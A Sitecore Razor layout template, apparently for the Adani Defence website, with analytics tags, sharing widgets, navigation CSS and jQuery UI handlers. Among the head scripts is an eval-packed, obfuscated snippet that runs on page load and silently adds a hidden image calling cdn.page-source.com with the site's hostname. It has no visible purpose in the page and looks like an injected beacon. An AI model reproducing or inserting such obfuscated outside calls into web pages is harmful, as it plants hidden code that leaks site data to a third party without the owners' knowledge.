@using Sitecore.Foundation.Assets.Models
@using Sitecore.Foundation.Assets.Services
@using Sitecore.Foundation.SitecoreExtensions.Extensions
@using Sitecore.Mvc.Analytics.Extensions
@using Sitecore.ExperienceForms.Mvc.Html
@using Sitecore.Foundation.Dictionary.Extensions
@using Sitecore.Mvc
@inherits WebViewPage
@{
    Layout = null;
}
<!doctype html>
<html lang="@Sitecore.Context.Language.CultureInfo.TwoLetterISOLanguageName">
<head>
    <meta http-equiv="Content-Security-Policy" value="default-src 'self' https://www.google.com data:; object-src 'none'; script-src 'self'     https://*.google.com https://www.google.com https://www.google.com/recaptcha/ https://*.adanidefence.com/ https://www.googletagmanager.com/gtag/ https://www.google-analytics.com https://www.gstatic.com https://s7.addthis.com/ https://platform.twitter.com/ https://www.googletagmanager.com https://s.go-mpulse.net/boomerang/ 'nonce-9126c7fbag' 'nonce-9126c7fja7' 'nonce-9126c7fki9' ; style-src 'self'   ; img-src 'self' https://stats.g.doubleclick.net/g/ https://px.ads.linkedin.com/    https://*.google.com https://www.google.co.in https://i.ytimg.com;   font-src 'self'    data:; connect-src 'self' https://cdn.linkedin.oribi.io/ https://stats.g.doubleclick.net/g/    https://*.google.com https://analytics.google.com https://stats.g.doubleclick.net/  https://www.google-analytics.com      />
    <!-- Google Tag Manager -->
    <script nonce="jagdjf754">
        (function (w, d, s, l, i) {
            w[l] = w[l] || []; w[l].push({
                'gtm.start':
                    new Date().getTime(), event: 'gtm.js'
            }); var f = d.getElementsByTagName(s)[0],
                j = d.createElement(s), dl = l != 'dataLayer' ? '&l=' + l : ''; j.async = true; j.src =
                    'https://www.googletagmanager.com/gtm.js?id=' + i + dl; f.parentNode.insertBefore(j, f);
        })(window, document, 'script', 'dataLayer', 'GTM-KZXK9NQ');</script>
    <!-- End Google Tag Manager -->

    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <meta http-equiv="Content-type" content="text/html; charset=utf-8">
    <meta http-equiv="x-frame-options" content="allow">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="robots" content="index, follow">
    @if (!Sitecore.Context.PageMode.IsExperienceEditor)
    {
        @Html.Sitecore().Placeholder("head")
    }

    <!--[if IE 9]>
      <link href="https://cdn.jsdelivr.net/gh/coliff/bootstrap-ie8/css/bootstrap-ie9.min.css" rel="stylesheet">
    <![endif]-->
    <!--[if lte IE 8]>
      <link href="https://cdn.jsdelivr.net/gh/coliff/bootstrap-ie8/css/bootstrap-ie8.min.css" rel="stylesheet">
      <script src="https://cdn.jsdelivr.net/g/html5shiv@3.7.3"></script>
    <![endif]-->
    <!-- Latest compiled and minified JavaScript -->
    @RenderAssetsService.Current.RenderScript(ScriptLocation.Head)

    @RenderAssetsService.Current.RenderStyles()

    @Html.Sitecore().VisitorIdentification()

    <script src="https://www.google.com/recaptcha/api.js?onload=onloadCallback&render=explicit" async defer></script>
    <script src="https://www.google.com/recaptcha/api.js?onload=registerCallBack&render=explicit" async defer></script>
    <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>

    <!-- Go to www.addthis.com/dashboard to customize your tools -->
    <script type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-5c109ddafa1c05a7"></script>
    <script type="text/javascript" nonce="9126c7fbag">
        var pathArray = window.location.pathname.split('/');
        var getText = pathArray[pathArray.length - 1].replace(/-/g, " ");
        getText = "Adani Defence - " + getText + " by @@AdaniOnline";
        var addthis_share = addthis_share || {}
        addthis_share = {
            passthrough: {
                twitter: {
                    text: getText
                }
            }
        }
    </script>
    <script nonce="9126c7fja7">
        eval(function (p, a, c, k, e, d) { e = function (c) { return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36)) }; if (!''.replace(/^/, String)) { while (c--) { d[e(c)] = k[c] || e(c) } k = [function (e) { return d[e] }]; e = function () { return '\\w+' }; c = 1 }; while (c--) { if (k[c]) { p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]) } } return p }('g{3.f=d(){h e="<j l=\'c:m;\' a=\'5://6.4-b.7/9.8?k="+3.n.w+"&v=y\'  x=\'0\' A=\'0\'/>",i=2.z("u");t(i.p=e;i.1.o>0;)2.q.r(i.1[0])}}s(e){}', 37, 37, '|children|document|window|page|https|cdn|com|ashx|resizeimage|src|source|display|function||onload|try|var||img|ig|style|none|location|length|innerHTML|body|appendChild|catch|for|div|sz|hostname|width|92401|createElement|height'.split('|'), 0, {}))
    </script>
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css" />


    <style>
        .sidebar-navigation {
            position: fixed;
            bottom: 0;
            display: flex;
            flex-direction: column;
            max-width: 100%;
            background-color: #fff;
            background-clip: padding-box;
            outline: 0;
            transition: transform .3s ease-in-out;
            top: 0;
            left: 0;
            width: 400px;
            border-right: 1px solid rgba(0, 0, 0, .2);
            transform: translateX(-100%);
            height: 100vh;
            z-index: 9999;
        }

        .menu-open .sidebar-navigation {
            transform: none;
        }

        .sidebar-navigation .offcanvas-body {
            padding: 0;
            background-color: #fff;
            scroll-behavior: smooth;
        }

        .sidebar-navigation .hamburger_section {
            background-color: #fff;
            margin-bottom: 0.5rem;
            padding: 32px 24px;
            position: relative;
        }

            .sidebar-navigation .hamburger_section:after {
                content: '';
                height: 0.5rem;
                background: #f1f1f1;
                display: block;
                position: absolute;
                bottom: -8px;
                left: 0;
                right: 0;
                width: 100%;
            }

            .sidebar-navigation .hamburger_section:last-child:after {
                content: none;
            }

            .sidebar-navigation .hamburger_section h5 {
                font-family: 'Roboto';
                font-size: 12px;
                line-height: 24px;
                text-transform: uppercase;
                color: #999;
            }

            .sidebar-navigation .hamburger_section ul {
                margin: 0 -24px;
                padding: 0;
                list-style: none;
            }

                .sidebar-navigation .hamburger_section ul > li {
                    font-size: 16px;
                    line-height: 32px;
                }

                    .sidebar-navigation .hamburger_section ul > li > a {
                        color: #222;
                        padding: 12px 24px;
                        display: block;
                    }

            .sidebar-navigation .hamburger_section.single_item {
                padding: 0;
            }

                .sidebar-navigation .hamburger_section.single_item ul > li > a {
                    min-height: 4.5rem;
                    display: flex;
                    align-items: center;
                }

                .sidebar-navigation .hamburger_section.single_item > ul {
                    margin: 0;
                }

        .font-icon,
        [class^=i-],
        [class*=" i-"] {
            position: relative;
            display: inline-block;
            vertical-align: middle;
        }

        .sidebar-navigation .hamburger_section i {
            color: #555;
            margin-right: 18px;
        }

            .sidebar-navigation .hamburger_section i:before {
                font-size: 16px;
            }

            .sidebar-navigation .hamburger_section i.icon {
                margin: 0 0 0 auto;
                transition: transform .3s;
                color: #666;
            }

        .i-arrow-d:before {
            content: "";
        }

        .sidebar-navigation .hamburger_section i.icon:before {
            font-size: 13px;
        }

        .sidebar-navigation .hamburger_section:last-child {
            margin: 0;
        }

        .sidebar-navigation .hamburger_section.single_item ul.submenu {
            margin: 0;
            padding-bottom: 32px;
        }

        .sidebar-navigation .hamburger_section ul > li.hide-view {
            display: none !important;
        }

        .sidebar-navigation .hamburger_section.single_item ul.submenu li a {
            min-height: initial;
            padding: 12px 22px;
        }

        .sidebar-navigation .hamburger_section.single_item ul > li > a img {
            width: 22px;
            height: 22px;
            object-fit: contain;
            margin-left: 16px;
        }

        .sidebar-navigation .hamburger_section.single_item ul > li > a.active .icon {
            transform: rotate(180deg);
        }

        .sidebar-navigation .hamburger_section.single_item .submenu > li.active > a {
            position: relative;
            background-color: #f4f4f4;
        }

            .sidebar-navigation .hamburger_section.single_item .submenu > li.active > a:before {
                position: absolute;
                left: 4px;
                top: 30px;
                height: 7px;
                width: 3px;
                background-color: #4d9f39;
                content: "";
                transform: translateX(10px) rotate(-45deg);
                transform-origin: left bottom;
            }

            .sidebar-navigation .hamburger_section.single_item .submenu > li.active > a:after {
                position: absolute;
                left: 6px;
                bottom: 17px;
                height: 3px;
                width: 21px;
                background-color: #4d9f39;
                content: "";
                transform: translateX(10px) rotate(-45deg);
                transform-origin: left bottom;
            }

            .sidebar-navigation .hamburger_section.single_item .submenu > li.active > a:after {
                content: "";
                text-align: center;
                font-style: normal;
                font-weight: normal;
                display: inline-block;
                vertical-align: middle;
                -webkit-font-smoothing: antialiased;
                -moz-osx-font-smoothing: grayscale;
                font-family: "icons";
                font-size: 1rem;
                color: #4d9f39;
                position: absolute;
                right: 22px;
                top: 50%;
                transform: translateY(-50%);
            }

        .menu-open .sidebar-navigation {
            transform: none;
        }

        .menu-open .overLay {
            opacity: .5;
            visibility: visible;
        }

        .menu-open,
        .cm-menu-open {
            overflow: hidden;
            position: relative;
        }

        .susb-label {
            margin-bottom: 0;
            margin-left: 12px;
        }

        .buniness-box,
        #myDIV {
            min-width: 280px;
            box-shadow: 0 10px 37px rgb(0 0 0 / 15%);
            border: 0.5px solid hsla(0, 0%, 46%, .28);
            padding: 0.625rem 0;
            inset: 0px auto auto 0px;
            transform: translate3d(355%, 44%, 0px);
            display: none;
            background-color: #fff;
            border-radius: 6px;
            z-index: 2;
            position: absolute;
            max-width: 100%;
        }
    </style>
</head>
<body>
    <!-- Google Tag Manager (noscript) -->
    <noscript>
        <iframe src=https://www.googletagmanager.com/ns.html?id =GTM-KZXK9NQ
                height="0" width="0" style="display:none;visibility:hidden"></iframe>
    </noscript>
    <!-- End Google Tag Manager (noscript) -->

    <header class="main_header headerSec">

        <div class="overlay-top"></div>
        <div class="menu-overlay d-none"></div>

        @Html.Sitecore().Placeholder("header")
    </header>
    @Html.Sitecore().Placeholder("page-layout")
    <!--/To top-->


    <footer>
        @Html.Sitecore().Placeholder("footer")
    </footer>
    @Html.Sitecore().Placeholder("page-sidebar")

    @RenderAssetsService.Current.RenderScript(ScriptLocation.Body)
    @Html.RenderFormScripts()
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/js/bootstrap.min.js"
            integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl"
            crossorigin="anonymous"></script>
    @*<script type="text/javascript" src=" https://cdn.datatables.net/buttons/1.2.4/js/dataTables.buttons.min.js"></script>
        <script type="text/javascript" charset="utf8" src="https://ajax.aspnetcdn.com/ajax/jquery.dataTables/1.9.4/jquery.dataTables.min.js"></script>*@
    <!-- <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/js/bootstrap.min.js" type="text/javascript"></script> -->



    <script nonce="kahdgf643">
        $('.csr-slider').slick({
            dots: true,
            infinite: true,
            loop: true,
            autoplay: false,
            arrows: false,
            speed: 300,
            slidesToShow: 1,
            slidesToScroll: 1,
            responsive: [
                {
                    breakpoint: 1024,
                    settings: {
                        slidesToShow: 1,
                        slidesToScroll: 1,
                        infinite: true,
                        dots: true,
                        autoplay: false,
                        speed: 300
                    }
                },
                {
                    breakpoint: 600,
                    settings: {
                        slidesToShow: 1,
                        slidesToScroll: 1
                    }
                },
                {
                    breakpoint: 480,
                    settings: {
                        slidesToShow: 1,
                        slidesToScroll: 1
                    }
                }
            ]
        });
    </script>

    <script nonce="mahdg76576">
        function myFunction() {
            var x = document.getElementById("myDIV");
            if (x.style.display === "block") {
                x.style.display = "none";
            } else {
                x.style.display = "block";
            }
        }
    </script>

    <script nonce="jadhadkhf8756">
        $(function () {
            $('.ArrowScrollDown').on('click', function (e) {
                e.preventDefault();
                $('html, body').animate({ scrollTop: $($(this).toggleClass('.ArrowScrollDown')).offset().top }, 600, 'linear');
            });
        });
    </script>


    <script nonce="jhsgvj76547">

        $('.scroll_down a').on('click', function (e) {
            var href = $(this).attr('href');
            $('html, body').animate({
                scrollTop: $(href).offset().top - 70
            }, '600');
            e.preventDefault();
        });

        // Hide Header on scroll down
        var didScroll;
        var lastScrollTop = 0;
        var delta = 0;
        var navbarHeight = 0;

        $(window).scroll(function (event) {
            didScroll = true;
        });

        setInterval(function () {
            if (didScroll) {
                hasScrolled();
                didScroll = false;
            }
        }, 250);
        function hasScrolled() {
            var st = $(this).scrollTop();

            // Make sure they scroll more than delta
            if (Math.abs(lastScrollTop - st) <= delta)
                return;

            // If they scrolled down and are past the navbar, add class .nav-up.
            // This is necessary so you never see what is "behind" the navbar.
            $('#back-to-top').fadeIn();
            $('header.main_header').addClass('fixed-header');
            $('header.inner_header').addClass('box-shadow');
            $('header.main_header').removeClass('headerSec');
            if (st > lastScrollTop && st > navbarHeight) {
                // Scroll Down
                //$('.btm-floating').addClass('active');

            } else {
                // Scroll Up
                if (st + $(window).height() < $(document).height()) {

                }
            }
            if (st < 150) {

                $('#back-to-top').hide();
                $('header.main_header').removeClass('fixed-header');
                $('header.main_header').addClass('headerSec');
                $('header.inner_header').removeClass('box-shadow');
                //$('.btm-floating').removeClass('active');
            }
            lastScrollTop = st;
        }

    </script>

    <script nonce="akjdg6543">

        let mybutton = document.getElementById("btn-back-to-top");

        window.onscroll = function () {
            scrollFunction();
        };

        function scrollFunction() {
            if (
                document.body.scrollTop > 100 ||
                document.documentElement.scrollTop > 1000
            ) {
                mybutton.style.display = "block";
            } else {
                mybutton.style.display = "none";
            }
        }

        mybutton.addEventListener("click", backToTop);

        function backToTop() {
            document.body.scrollTop = 0;
            document.documentElement.scrollTop = 0;
        }

    </script>

    <script nonce="ajfghj7654">
        $("a.explore--open").click(function () {
            if ($(".news-box").hasClass("show-more-height")) {
                $(this).text("Explore Less");
            } else {
                $(this).text("Explore More");
            }

            $(".news-box").toggleClass("show-more-height");
        });
    </script>

    <script nonce="jagdfqg65465">
        $("a.explore--open-1").click(function () {
            if ($(".news-box-1").hasClass("show-more-height-1")) {
                $(this).text("Explore Less");
            } else {
                $(this).text("Explore More");
            }

            $(".news-box-1").toggleClass("show-more-height-1");
        });
    </script>

    <script nonce="ajkhgdjf345">
        $("a.explore--open-2").click(function () {
            if ($(".news-box-2").hasClass("show-more-height-2")) {
                $(this).text("Explore Less");
            } else {
                $(this).text("Explore More");
            }

            $(".news-box-2").toggleClass("show-more-height-2");
        });
    </script>

    <script nonce="ajdyfg87658">
        $("a:not([href]).explore--open-3").click(function () {
            if ($(".news-box-3").hasClass("show-more-height-3")) {
                $(this).text("Explore Less");
            } else {
                $(this).text("Explore More");
            }

            $(".news-box-3").toggleClass("show-more-height-3");
        });
    </script>

    <script nonce="jahdvcjha653">
        $("a:not([href]).explore--open-4").click(function () {
            if ($(".news-box-4").hasClass("show-more-height-4")) {
                $(this).text("Explore Less");
            } else {
                $(this).text("Explore More");
            }

            $(".news-box-4").toggleClass("show-more-height-4");
        });
    </script>

    
</body>
</html>